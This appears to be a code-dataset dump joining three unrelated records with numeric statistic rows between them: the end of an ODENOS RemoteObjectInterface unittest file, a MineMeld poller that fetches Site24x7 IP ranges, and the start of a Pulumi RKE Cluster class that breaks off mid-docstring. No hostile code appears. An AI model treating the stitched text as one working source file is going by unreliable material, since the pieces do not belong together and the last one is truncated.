return_value=Response(Response.StatusCode.OK, value)),
patch('logging.debug')) as (m_send_request, m_log_debug):
self.result = self.target._post_object_to_remote_object(Path,
value)
self.assertEqual(m_send_request.call_count, 1)
m_send_request.assert_any_call(method, Path, value)
self.assertEqual(m_log_debug.call_count, 0)
self.assertNotEqual(self.result, None)
def test__post_object_to_remote_object_StatusCode_NotOK(self):
Path = RemoteObjectInterface.PROPETY_PATH
method = Request.Method.POST
_object_id = self.object_id
status_code = Response.StatusCode.NOT_FOUND
debug_log = "Error Response POST DestID:" + _object_id\
+ " Path:" + Path\
+ " StatusCode:" + str(status_code)
value = "propertyBody"
with nested(
patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface.'
'_RemoteObjectInterface__send_request',
return_value=Response(status_code,
value)),
patch('logging.debug')) as (m_send_request, m_log_debug):
self.result = self.target._post_object_to_remote_object(Path,
value)
self.assertEqual(m_send_request.call_count, 1)
m_send_request.assert_any_call(method, Path, value)
self.assertEqual(m_log_debug.call_count, 1)
m_log_debug.assert_any_call(debug_log)
self.assertNotEqual(self.result, None)
def test__put_object_to_remote_object_success(self):
Path = RemoteObjectInterface.PROPETY_PATH
method = Request.Method.PUT
_object_id = self.object_id
value = "propertyBody"
with nested(
patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface.'
'_RemoteObjectInterface__send_request',
return_value=Response(Response.StatusCode.OK, value)),
patch('logging.debug')) as (m_send_request, m_log_debug):
self.result = self.target._put_object_to_remote_object(Path,
value)
self.assertEqual(m_send_request.call_count, 1)
m_send_request.assert_any_call(method, Path, value)
self.assertEqual(m_log_debug.call_count, 0)
self.assertNotEqual(self.result, None)
def test__put_object_to_remote_object_StatusCode_NotOK(self):
Path = RemoteObjectInterface.PROPETY_PATH
method = Request.Method.PUT
_object_id = self.object_id
status_code = Response.StatusCode.NOT_FOUND
debug_log = "Error Response PUT DestID:" + _object_id\
+ " Path:" + Path\
+ " StatusCode:" + str(status_code)
value = "propertyBody"
with nested(
patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface.'
'_RemoteObjectInterface__send_request',
return_value=Response(status_code,
value)),
patch('logging.debug')) as (m_send_request, m_log_debug):
self.result = self.target._put_object_to_remote_object(Path,
value)
self.assertEqual(m_send_request.call_count, 1)
m_send_request.assert_any_call(method, Path, value)
self.assertEqual(m_log_debug.call_count, 1)
m_log_debug.assert_any_call(debug_log)
self.assertNotEqual(self.result, None)
def test__del_object_to_remote_object_success(self):
Path = RemoteObjectInterface.PROPETY_PATH
method = Request.Method.DELETE
_object_id = self.object_id
value = "propertyBody"
with nested(
patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface.'
'_RemoteObjectInterface__send_request',
return_value=Response(Response.StatusCode.OK, value)),
patch('logging.debug')) as (m_send_request, m_log_debug):
self.result = self.target._del_object_to_remote_object(Path,
value)
self.assertEqual(m_send_request.call_count, 1)
m_send_request.assert_any_call(method, Path, body=value)
self.assertEqual(m_log_debug.call_count, 0)
self.assertNotEqual(self.result, None)
def test__del_object_to_remote_object_success_Nobody(self):
Path = RemoteObjectInterface.PROPETY_PATH
method = Request.Method.DELETE
_object_id = self.object_id
with nested(
patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface.'
'_RemoteObjectInterface__send_request',
return_value=Response(Response.StatusCode.OK, None)),
patch('logging.debug')) as (m_send_request, m_log_debug):
self.result = self.target._del_object_to_remote_object(Path)
self.assertEqual(m_send_request.call_count, 1)
m_send_request.assert_any_call(method, Path, body=None)
self.assertEqual(m_log_debug.call_count, 0)
self.assertNotEqual(self.result, None)
def test__del_object_to_remote_object_StatusCode_NotOK(self):
Path = RemoteObjectInterface.PROPETY_PATH
method = Request.Method.DELETE
_object_id = self.object_id
status_code = Response.StatusCode.NOT_FOUND
debug_log = "Error Response DELETE DestID:" + _object_id\
+ " Path:" + Path\
+ " StatusCode:" + str(status_code)
value = "propertyBody"
with nested(
patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface.'
'_RemoteObjectInterface__send_request',
return_value=Response(status_code,
value)),
patch('logging.debug')) as (m_send_request, m_log_debug):
self.result = self.target._del_object_to_remote_object(Path,
value)
self.assertEqual(m_send_request.call_count, 1)
m_send_request.assert_any_call(method, Path, body=value)
self.assertEqual(m_log_debug.call_count, 1)
m_log_debug.assert_any_call(debug_log)
self.assertNotEqual(self.result, None)
def test__get_object_to_remote_object_success(self):
Path = RemoteObjectInterface.PROPETY_PATH
method = Request.Method.GET
_object_id = self.object_id
with nested(
patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface.'
'_RemoteObjectInterface__send_request',
return_value=Response(Response.StatusCode.OK, None)),
patch('logging.debug')) as (m_send_request, m_log_debug):
self.result = self.target._get_object_to_remote_object(Path)
self.assertEqual(m_send_request.call_count, 1)
m_send_request.assert_any_call(method, Path)
self.assertEqual(m_log_debug.call_count, 0)
self.assertNotEqual(self.result, None)
def test__get_object_to_remote_object_StatusCode_NotOK(self):
Path = RemoteObjectInterface.PROPETY_PATH
method = Request.Method.GET
_object_id = self.object_id
status_code = Response.StatusCode.NOT_FOUND
debug_log = "Error Response GET DestID:" + _object_id\
+ " Path:" + Path\
+ " StatusCode:" + str(status_code)
with nested(
patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface.'
'_RemoteObjectInterface__send_request',
return_value=Response(status_code,
None)),
patch('logging.debug')) as (m_send_request, m_log_debug):
self.result = self.target._get_object_to_remote_object(Path)
self.assertEqual(m_send_request.call_count, 1)
m_send_request.assert_any_call(method, Path)
self.assertEqual(m_log_debug.call_count, 1)
m_log_debug.assert_any_call(debug_log)
self.assertNotEqual(self.result, None)
def test___send_request_success(self):
Path = RemoteObjectInterface.PROPETY_PATH
method = Request.Method.GET
_object_id = self.object_id
_txid = self.txid
value = "propertyBody"
dmy_request_sync = self.Disppatcher.request_sync
dmy_request_sync.return_value = "result_request_sync"
with patch('logging.error') as m_log_error:
self.result = self.target._RemoteObjectInterface__send_request(
method, Path, value)
self.assertEqual(dmy_request_sync.call_count, 1)
self.assertEqual(dmy_request_sync.call_args[0][0].
packed_object(),
(_object_id, method, Path, _txid, value))
self.assertEqual(m_log_error[0].call_count, 0)
self.assertEqual(self.result, "result_request_sync")
def test___send_request_request_sync_error(self):
Path = RemoteObjectInterface.PROPETY_PATH
method = Request.Method.GET
_object_id = self.object_id
_txid = self.txid
value = "propertyBody"
dmy_request_sync = self.Disppatcher.request_sync
dmy_request_sync.side_effect = KeyError(1)
dmy_request_sync.return_value = "result_request_sync"
debug_log = "Exception: Request to " + _object_id \
+ " Method:" + method\
+ " Path:" + Path
with nested(
patch('logging.error')) as m_log_error:
self.result = self.target._RemoteObjectInterface__send_request(
method, Path, value)
self.assertEqual(dmy_request_sync.call_count, 1)
self.assertEqual(dmy_request_sync.call_args[0][0].
packed_object(),
(_object_id, method, Path, _txid, value))
self.assertEqual(m_log_error[0].call_count, 2)
m_log_error[0].assert_any_call(debug_log)
self.assertNotEqual(self.result, "result_request_sync")
self.assertEqual(self.result.packed_object(),
(Response.StatusCode.INTERNAL_SERVER_ERROR,
None))
if __name__ == '__main__':
unittest.main()
| 46.138021
| 79
| 0.588531
| 1,806
| 17,717
| 5.421927
| 0.084718
| 0.062806
| 0.04902
| 0.04902
| 0.870915
| 0.853656
| 0.844975
| 0.83752
| 0.81873
| 0.795547
| 0
| 0.006016
| 0.333917
| 17,717
| 383
| 80
| 46.258486
| 0.823744
| 0.053
| 0
| 0.781046
| 0
| 0
| 0.135692
| 0.098581
| 0
| 0
| 0
| 0
| 0.232026
| 1
| 0.068627
| false
| 0
| 0.019608
| 0
| 0.091503
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8e52e8200994b43cdcaf1b7b0da63e22c59279f4
| 2,969
|
py
|
Python
|
site24x7miner/node.py
|
bilalbox/site24x7-miner
|
79e90a2ba6a4e4eb675437489ee5d5825810abc6
|
[
"Apache-2.0"
] | null | null | null |
site24x7miner/node.py
|
bilalbox/site24x7-miner
|
79e90a2ba6a4e4eb675437489ee5d5825810abc6
|
[
"Apache-2.0"
] | null | null | null |
site24x7miner/node.py
|
bilalbox/site24x7-miner
|
79e90a2ba6a4e4eb675437489ee5d5825810abc6
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
import logging
import requests
import json
from minemeld.ft.basepoller import BasePollerFT
LOG = logging.getLogger(__name__)
class IPv4(BasePollerFT):
def configure(self):
super(IPv4, self).configure()
self.polling_timeout = self.config.get('polling_timeout', 20)
self.verify_cert = self.config.get('verify_cert', False)
self.url = 'https://creatorexport.zoho.com/site24x7/location-manager/json/IP_Address_View/C80EnP71mW2fDd60GaDgnPbVwMS8AGmP85vrN27EZ1CnCjPwnm0zPB5EX4Ct4q9n3rUnUgYwgwX0BW3KFtxnBqHt60Sz1Pgntgru/'
def _process_item(self, item):
# called on each item returned by _build_iterator
# it should return a list of (indicator, value) pairs
if item is None:
LOG.error('%s - no IP information found', self.name)
return []
else:
value = {
'type': 'IPv4',
'confidence': 100
}
return [[item, value]]
def _build_iterator(self, now):
# called at every polling interval
# here you should retrieve and return the list of items
r = requests.get(self.url)
try:
r.raise_for_status()
except:
LOG.debug('%s - exception in request: %s %s',
self.name, r.status_code, r.content)
raise
# parse the results into a list
j = json.loads(r.text)['LocationDetails']
return iter(l.rstrip(',') for loc in j for l in loc['external_ip'].split())
class IPv6(BasePollerFT):
def configure(self):
super(IPv6, self).configure()
self.polling_timeout = self.config.get('polling_timeout', 20)
self.verify_cert = self.config.get('verify_cert', False)
self.url = 'https://creatorexport.zoho.com/site24x7/location-manager/json/IP_Address_View/C80EnP71mW2fDd60GaDgnPbVwMS8AGmP85vrN27EZ1CnCjPwnm0zPB5EX4Ct4q9n3rUnUgYwgwX0BW3KFtxnBqHt60Sz1Pgntgru/'
def _process_item(self, item):
# called on each item returned by _build_iterator
# it should return a list of (indicator, value) pairs
if item is None:
LOG.error('%s - no IP information found', self.name)
return []
else:
value = {
'type': 'IPv6',
'confidence': 100
}
return [[item, value]]
def _build_iterator(self, now):
# called at every polling interval
# here you should retrieve and return the list of items
r = requests.get(self.url)
try:
r.raise_for_status()
except:
LOG.debug('%s - exception in request: %s %s',
self.name, r.status_code, r.content)
raise
# parse the results into a list
j = json.loads(r.text)['LocationDetails']
return iter(l.rstrip(',') for loc in j for l in loc['IPv6_Address_External'].split())
| 33.738636
| 200
| 0.616706
| 344
| 2,969
| 5.200581
| 0.30814
| 0.029067
| 0.029067
| 0.031302
| 0.885411
| 0.848519
| 0.848519
| 0.848519
| 0.848519
| 0.848519
| 0
| 0.033475
| 0.285618
| 2,969
| 87
| 201
| 34.126437
| 0.809995
| 0.14584
| 0
| 0.724138
| 0
| 0
| 0.249505
| 0.008317
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0.086207
| 0
| 0.327586
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6d093798ef39de535f6b2ef5d31bcaffe80bf0fe
| 165,391
|
py
|
Python
|
sdk/python/pulumi_rke/cluster.py
|
mitchellmaler/pulumi-rke
|
af2e3416c802f7b3eea7102788c9aed3cfd65f20
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_rke/cluster.py
|
mitchellmaler/pulumi-rke
|
af2e3416c802f7b3eea7102788c9aed3cfd65f20
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_rke/cluster.py
|
mitchellmaler/pulumi-rke
|
af2e3416c802f7b3eea7102788c9aed3cfd65f20
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from . import utilities, tables
class Cluster(pulumi.CustomResource):
addon_job_timeout: pulumi.Output[float]
"""
RKE k8s cluster addon deployment timeout in seconds for status check (int)
"""
addons: pulumi.Output[str]
"""
RKE k8s cluster user addons YAML manifest to be deployed (string)
"""
addons_includes: pulumi.Output[list]
"""
RKE k8s cluster user addons YAML manifest urls or paths to be deployed (list)
"""
api_server_url: pulumi.Output[str]
"""
(Computed) RKE k8s cluster api server url (string)
"""
authentication: pulumi.Output[dict]
"""
RKE k8s cluster authentication configuration (list maxitems:1)
* `sans` (`list`) - List of additional hostnames and IPs to include in the api server PKI cert (list)
* `strategy` (`str`) - Authentication strategy that will be used in RKE k8s cluster. Default: `x509` (string)
* `webhook` (`dict`) - Webhook configuration options (list maxitem: 1)
* `cacheTimeout` (`str`) - Controls how long to cache authentication decisions (string)
* `configFile` (`str`) - Multiline string that represent a custom webhook config file (string)
"""
authorization: pulumi.Output[dict]
"""
RKE k8s cluster authorization mode configuration (list maxitems:1)
* `mode` (`str`) - RKE mode for authorization. `rbac` and `none` modes are available. Default `rbac` (string)
* `options` (`dict`) - Network provider options (map)
"""
bastion_host: pulumi.Output[dict]
"""
RKE k8s cluster bastion Host configuration (list maxitems:1)
* `address` (`str`) - Address ip for node (string)
* `port` (`str`) - Port used for SSH communication. Default `22` (string)
* `ssh_agent_auth` (`bool`) - SSH Agent Auth enable (bool)
* `sshCert` (`str`) - SSH Certificate (string)
* `ssh_cert_path` (`str`) - SSH Certificate path (string)
* `sshKey` (`str`) - SSH Private Key (string)
* `ssh_key_path` (`str`) - SSH Private Key path (string)
* `user` (`str`) - Registry user (string)
"""
ca_crt: pulumi.Output[str]
"""
(Computed/Sensitive) RKE k8s cluster CA certificate (string)
"""
cert_dir: pulumi.Output[str]
"""
Specify a certificate dir path (string)
"""
certificates: pulumi.Output[list]
"""
(Computed/Sensitive) RKE k8s cluster certificates (string)
* `certificate` (`str`)
* `commonName` (`str`)
* `config` (`str`)
* `configEnvName` (`str`)
* `configPath` (`str`)
* `envName` (`str`)
* `id` (`str`) - (Computed) The ID of the resource (string)
* `key` (`str`) - TLS key for etcd service (string)
* `keyEnvName` (`str`)
* `keyPath` (`str`)
* `name` (`str`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `ouName` (`str`)
* `path` (`str`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
"""
client_cert: pulumi.Output[str]
"""
(Computed/Sensitive) RKE k8s cluster client certificate (string)
"""
client_key: pulumi.Output[str]
"""
(Computed/Sensitive) RKE k8s cluster client key (string)
"""
cloud_provider: pulumi.Output[dict]
"""
Calico cloud provider (string)
* `awsCloudConfig` (`dict`) - Use aws_cloud_provider instead
* `global` (`dict`) - (list maxitems:1)
* `disableSecurityGroupIngress` (`bool`) - Disables the automatic ingress creation. Default `false` (bool)
* `disableStrictZoneCheck` (`bool`) - Setting this to true will disable the check and provide a warning that the check was skipped. Default `false` (bool)
* `elbSecurityGroup` (`str`) - Use these ELB security groups instead create new (string)
* `kubernetesClusterId` (`str`) - The cluster id we'll use to identify our cluster resources (string)
* `kubernetesClusterTag` (`str`) - Legacy cluster id we'll use to identify our cluster resources (string)
* `roleArn` (`str`) - IAM role to assume when interaction with AWS APIs (string)
* `routeTableId` (`str`) - Enables using a specific RouteTable (string)
* `subnetId` (`str`) - (string)
* `vpc` (`str`) - The AWS VPC flag enables the possibility to run the master components on a different aws account, on a different cloud provider or on-premises. If the flag is set also the KubernetesClusterTag must be provided (string)
* `zone` (`str`) - The AWS zone (string)
* `serviceOverrides` (`list`) - (list)
* `key` (`str`) - TLS key for etcd service (string)
* `region` (`str`) - Region for S3 service (string)
* `service` (`str`) - (string)
* `signingMethod` (`str`) - (string)
* `signingName` (`str`) - (string)
* `signingRegion` (`str`) - (string)
* `url` (`str`) - Registry URL (string)
* `awsCloudProvider` (`dict`) - AWS Cloud Provider config [rke-aws-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/aws/) (list maxitems:1)
* `global` (`dict`) - (list maxitems:1)
* `disableSecurityGroupIngress` (`bool`) - Disables the automatic ingress creation. Default `false` (bool)
* `disableStrictZoneCheck` (`bool`) - Setting this to true will disable the check and provide a warning that the check was skipped. Default `false` (bool)
* `elbSecurityGroup` (`str`) - Use these ELB security groups instead create new (string)
* `kubernetesClusterId` (`str`) - The cluster id we'll use to identify our cluster resources (string)
* `kubernetesClusterTag` (`str`) - Legacy cluster id we'll use to identify our cluster resources (string)
* `roleArn` (`str`) - IAM role to assume when interaction with AWS APIs (string)
* `routeTableId` (`str`) - Enables using a specific RouteTable (string)
* `subnetId` (`str`) - (string)
* `vpc` (`str`) - The AWS VPC flag enables the possibility to run the master components on a different aws account, on a different cloud provider or on-premises. If the flag is set also the KubernetesClusterTag must be provided (string)
* `zone` (`str`) - The AWS zone (string)
* `serviceOverrides` (`list`) - (list)
* `key` (`str`) - TLS key for etcd service (string)
* `region` (`str`) - Region for S3 service (string)
* `service` (`str`) - (string)
* `signingMethod` (`str`) - (string)
* `signingName` (`str`) - (string)
* `signingRegion` (`str`) - (string)
* `url` (`str`) - Registry URL (string)
* `azureCloudConfig` (`dict`) - Use azure_cloud_provider instead
* `aadClientCertPassword` (`str`) - (string)
* `aadClientCertPath` (`str`) - (string)
* `aadClientId` (`str`) - (string)
* `aadClientSecret` (`str`) - (string)
* `cloud` (`str`) - (string)
* `cloudProviderBackoff` (`bool`) - (bool)
* `cloudProviderBackoffDuration` (`float`) - (int)
* `cloudProviderBackoffExponent` (`float`) - (int)
* `cloudProviderBackoffJitter` (`float`) - (int)
* `cloudProviderBackoffRetries` (`float`) - (int)
* `cloudProviderRateLimit` (`bool`) - (bool)
* `cloudProviderRateLimitBucket` (`float`) - (int)
* `cloudProviderRateLimitQps` (`float`) - (int)
* `loadBalancerSku` (`str`)
* `location` (`str`) - (string)
* `maximumLoadBalancerRuleCount` (`float`) - (int)
* `primaryAvailabilitySetName` (`str`) - (string)
* `primaryScaleSetName` (`str`) - (string)
* `resourceGroup` (`str`) - (string)
* `routeTableName` (`str`) - (string)
* `securityGroupName` (`str`) - (string)
* `subnetName` (`str`) - (string)
* `subscriptionId` (`str`) - (string)
* `tenantId` (`str`) - Required if `tenant_name` not provided. (string)
* `useInstanceMetadata` (`bool`) - (bool)
* `useManagedIdentityExtension` (`bool`) - (bool)
* `vmType` (`str`) - (string)
* `vnetName` (`str`) - (string)
* `vnetResourceGroup` (`str`) - (string)
* `azureCloudProvider` (`dict`) - Azure Cloud Provider config [rke-azure-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/azure/) (list maxitems:1)
* `aadClientCertPassword` (`str`) - (string)
* `aadClientCertPath` (`str`) - (string)
* `aadClientId` (`str`) - (string)
* `aadClientSecret` (`str`) - (string)
* `cloud` (`str`) - (string)
* `cloudProviderBackoff` (`bool`) - (bool)
* `cloudProviderBackoffDuration` (`float`) - (int)
* `cloudProviderBackoffExponent` (`float`) - (int)
* `cloudProviderBackoffJitter` (`float`) - (int)
* `cloudProviderBackoffRetries` (`float`) - (int)
* `cloudProviderRateLimit` (`bool`) - (bool)
* `cloudProviderRateLimitBucket` (`float`) - (int)
* `cloudProviderRateLimitQps` (`float`) - (int)
* `loadBalancerSku` (`str`)
* `location` (`str`) - (string)
* `maximumLoadBalancerRuleCount` (`float`) - (int)
* `primaryAvailabilitySetName` (`str`) - (string)
* `primaryScaleSetName` (`str`) - (string)
* `resourceGroup` (`str`) - (string)
* `routeTableName` (`str`) - (string)
* `securityGroupName` (`str`) - (string)
* `subnetName` (`str`) - (string)
* `subscriptionId` (`str`) - (string)
* `tenantId` (`str`) - Required if `tenant_name` not provided. (string)
* `useInstanceMetadata` (`bool`) - (bool)
* `useManagedIdentityExtension` (`bool`) - (bool)
* `vmType` (`str`) - (string)
* `vnetName` (`str`) - (string)
* `vnetResourceGroup` (`str`) - (string)
* `customCloudConfig` (`str`) - Use custom_cloud_provider instead
* `customCloudProvider` (`str`) - Custom Cloud Provider config (string)
* `name` (`str`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `openstackCloudConfig` (`dict`) - Use openstack_cloud_provider instead
* `blockStorage` (`dict`) - (list maxitems:1)
* `bsVersion` (`str`) - (string)
* `ignoreVolumeAz` (`bool`) - (string)
* `trustDevicePath` (`bool`) - (string)
* `global` (`dict`) - (list maxitems:1)
* `authUrl` (`str`) - (string)
* `caFile` (`str`) - (string)
* `domainId` (`str`) - Required if `domain_name` not provided. (string)
* `domainName` (`str`) - Required if `domain_id` not provided. (string)
* `password` (`str`) - Registry password (string)
* `region` (`str`) - Region for S3 service (string)
* `tenantId` (`str`) - Required if `tenant_name` not provided. (string)
* `tenantName` (`str`) - Required if `tenant_id` not provided. (string)
* `trustId` (`str`) - (string)
* `userId` (`str`) - Required if `username` not provided. (string)
* `username` (`str`) - Required if `user_id` not provided. (string)
* `loadBalancer` (`dict`) - (list maxitems:1)
* `createMonitor` (`bool`) - (bool)
* `floatingNetworkId` (`str`) - (string)
* `lbMethod` (`str`) - (string)
* `lbProvider` (`str`) - (string)
* `lbVersion` (`str`) - (string)
* `manageSecurityGroups` (`bool`) - (bool)
* `monitorDelay` (`str`) - Default `60s` (string)
* `monitorMaxRetries` (`float`) - Default 5 (int)
* `monitorTimeout` (`str`) - Default `30s` (string)
* `subnetId` (`str`) - (string)
* `useOctavia` (`bool`) - (bool)
* `metadata` (`dict`) - (list maxitems:1)
* `requestTimeout` (`float`) - (int)
* `searchOrder` (`str`) - (string)
* `route` (`dict`) - (list maxitems:1)
* `routerId` (`str`) - (string)
* `openstackCloudProvider` (`dict`) - Openstack Cloud Provider config [rke-openstack-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/openstack/) (list maxitems:1)
* `blockStorage` (`dict`) - (list maxitems:1)
* `bsVersion` (`str`) - (string)
* `ignoreVolumeAz` (`bool`) - (string)
* `trustDevicePath` (`bool`) - (string)
* `global` (`dict`) - (list maxitems:1)
* `authUrl` (`str`) - (string)
* `caFile` (`str`) - (string)
* `domainId` (`str`) - Required if `domain_name` not provided. (string)
* `domainName` (`str`) - Required if `domain_id` not provided. (string)
* `password` (`str`) - Registry password (string)
* `region` (`str`) - Region for S3 service (string)
* `tenantId` (`str`) - Required if `tenant_name` not provided. (string)
* `tenantName` (`str`) - Required if `tenant_id` not provided. (string)
* `trustId` (`str`) - (string)
* `userId` (`str`) - Required if `username` not provided. (string)
* `username` (`str`) - Required if `user_id` not provided. (string)
* `loadBalancer` (`dict`) - (list maxitems:1)
* `createMonitor` (`bool`) - (bool)
* `floatingNetworkId` (`str`) - (string)
* `lbMethod` (`str`) - (string)
* `lbProvider` (`str`) - (string)
* `lbVersion` (`str`) - (string)
* `manageSecurityGroups` (`bool`) - (bool)
* `monitorDelay` (`str`) - Default `60s` (string)
* `monitorMaxRetries` (`float`) - Default 5 (int)
* `monitorTimeout` (`str`) - Default `30s` (string)
* `subnetId` (`str`) - (string)
* `useOctavia` (`bool`) - (bool)
* `metadata` (`dict`) - (list maxitems:1)
* `requestTimeout` (`float`) - (int)
* `searchOrder` (`str`) - (string)
* `route` (`dict`) - (list maxitems:1)
* `routerId` (`str`) - (string)
* `vsphereCloudConfig` (`dict`) - Use vsphere_cloud_provider instead
* `disk` (`dict`) - (list maxitems:1)
* `scsiControllerType` (`str`) - (string)
* `global` (`dict`) - (list maxitems:1)
* `datacenter` (`str`) - (string)
* `datacenters` (`str`) - (string)
* `datastore` (`str`) - (string)
* `insecureFlag` (`bool`) - (bool)
* `password` (`str`) - Registry password (string)
* `port` (`str`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`float`) - (int)
* `user` (`str`) - Registry user (string)
* `vmName` (`str`) - (string)
* `vmUuid` (`str`) - (string)
* `workingDir` (`str`) - (string)
* `network` (`dict`) - (list maxitems:1)
* `publicNetwork` (`str`) - (string)
* `virtualCenters` (`list`) - (List)
* `datacenters` (`str`) - (string)
* `name` (`str`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `password` (`str`) - Registry password (string)
* `port` (`str`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`float`) - (int)
* `user` (`str`) - Registry user (string)
* `workspace` (`dict`) - (list maxitems:1)
* `datacenter` (`str`) - (string)
* `defaultDatastore` (`str`) - (string)
* `folder` (`str`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `resourcepoolPath` (`str`) - (string)
* `server` (`str`) - (string)
* `vsphereCloudProvider` (`dict`) - Vsphere Cloud Provider config [rke-vsphere-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/vsphere/) Extra argument `name` is required on `virtual_center` configuration. (list maxitems:1)
* `disk` (`dict`) - (list maxitems:1)
* `scsiControllerType` (`str`) - (string)
* `global` (`dict`) - (list maxitems:1)
* `datacenter` (`str`) - (string)
* `datacenters` (`str`) - (string)
* `datastore` (`str`) - (string)
* `insecureFlag` (`bool`) - (bool)
* `password` (`str`) - Registry password (string)
* `port` (`str`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`float`) - (int)
* `user` (`str`) - Registry user (string)
* `vmName` (`str`) - (string)
* `vmUuid` (`str`) - (string)
* `workingDir` (`str`) - (string)
* `network` (`dict`) - (list maxitems:1)
* `publicNetwork` (`str`) - (string)
* `virtualCenters` (`list`) - (List)
* `datacenters` (`str`) - (string)
* `name` (`str`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `password` (`str`) - Registry password (string)
* `port` (`str`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`float`) - (int)
* `user` (`str`) - Registry user (string)
* `workspace` (`dict`) - (list maxitems:1)
* `datacenter` (`str`) - (string)
* `defaultDatastore` (`str`) - (string)
* `folder` (`str`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `resourcepoolPath` (`str`) - (string)
* `server` (`str`) - (string)
"""
cluster_cidr: pulumi.Output[str]
"""
Cluster CIDR option for kube controller service (string)
"""
cluster_dns_server: pulumi.Output[str]
"""
Cluster DNS Server option for kubelet service (string)
"""
cluster_domain: pulumi.Output[str]
"""
Cluster Domain option for kubelet service. Default `cluster.local` (string)
"""
cluster_name: pulumi.Output[str]
"""
RKE k8s cluster name used in the kube config (string)
"""
cluster_yaml: pulumi.Output[str]
"""
RKE k8s cluster config yaml encoded. Provider arguments take precedence over this one (string)
"""
control_plane_hosts: pulumi.Output[list]
"""
(Computed) RKE k8s cluster control plane nodes (list)
* `address` (`str`) - Address ip for node (string)
* `nodeName` (`str`) - Name of the host provisioned via docker machine (string)
"""
custom_certs: pulumi.Output[bool]
"""
Use custom certificates from a cert dir (string)
"""
delay_on_creation: pulumi.Output[float]
"""
RKE k8s cluster delay on creation (int)
"""
dind: pulumi.Output[bool]
"""
Deploy RKE cluster on a dind environment. Default: `false` (bool)
"""
dind_dns_server: pulumi.Output[str]
"""
DinD RKE cluster dns (string)
"""
dind_storage_driver: pulumi.Output[str]
"""
DinD RKE cluster storage driver (string)
"""
disable_port_check: pulumi.Output[bool]
"""
Enable/Disable RKE k8s cluster port checking. Default `false` (bool)
"""
dns: pulumi.Output[dict]
"""
RKE k8s cluster DNS Config (list maxitems:1)
* `nodeSelector` (`dict`) - Node selector key pair (map)
* `provider` (`str`) - Monitoring provider (string)
* `reverseCidrs` (`list`) - Reverse CIDRs (list)
* `upstreamNameservers` (`list`) - Upstream nameservers (list)
"""
etcd_hosts: pulumi.Output[list]
"""
(Computed) RKE k8s cluster etcd nodes (list)
* `address` (`str`) - Address ip for node (string)
* `nodeName` (`str`) - Name of the host provisioned via docker machine (string)
"""
ignore_docker_version: pulumi.Output[bool]
"""
Enable/Disable RKE k8s cluster strict docker version checking. Default `false` (bool)
"""
inactive_hosts: pulumi.Output[list]
"""
(Computed) RKE k8s cluster inactive nodes (list)
* `address` (`str`) - Address ip for node (string)
* `nodeName` (`str`) - Name of the host provisioned via docker machine (string)
"""
ingress: pulumi.Output[dict]
"""
Docker image for ingress (string)
* `dnsPolicy` (`str`) - Ingress controller DNS policy. `ClusterFirstWithHostNet`, `ClusterFirst`, `Default`, and `None` are supported. [K8S dns Policy](https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/#pod-s-dns-policy) (string)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `nodeSelector` (`dict`) - Node selector key pair (map)
* `options` (`dict`) - Network provider options (map)
* `provider` (`str`) - Monitoring provider (string)
"""
internal_kube_config_yaml: pulumi.Output[str]
"""
(Computed/Sensitive) RKE k8s cluster internal kube config yaml (string)
"""
kube_admin_user: pulumi.Output[str]
"""
(Computed) RKE k8s cluster admin user (string)
"""
kube_config_yaml: pulumi.Output[str]
"""
(Computed/Sensitive) RKE k8s cluster kube config yaml (string)
"""
kubernetes_version: pulumi.Output[str]
"""
K8s version to deploy. If kubernetes image is specified, image version takes precedence. Default: `rke default` (string)
"""
monitoring: pulumi.Output[dict]
"""
RKE k8s cluster monitoring Config (list maxitems:1)
* `nodeSelector` (`dict`) - Node selector key pair (map)
* `options` (`dict`) - Network provider options (map)
* `provider` (`str`) - Monitoring provider (string)
"""
network: pulumi.Output[dict]
"""
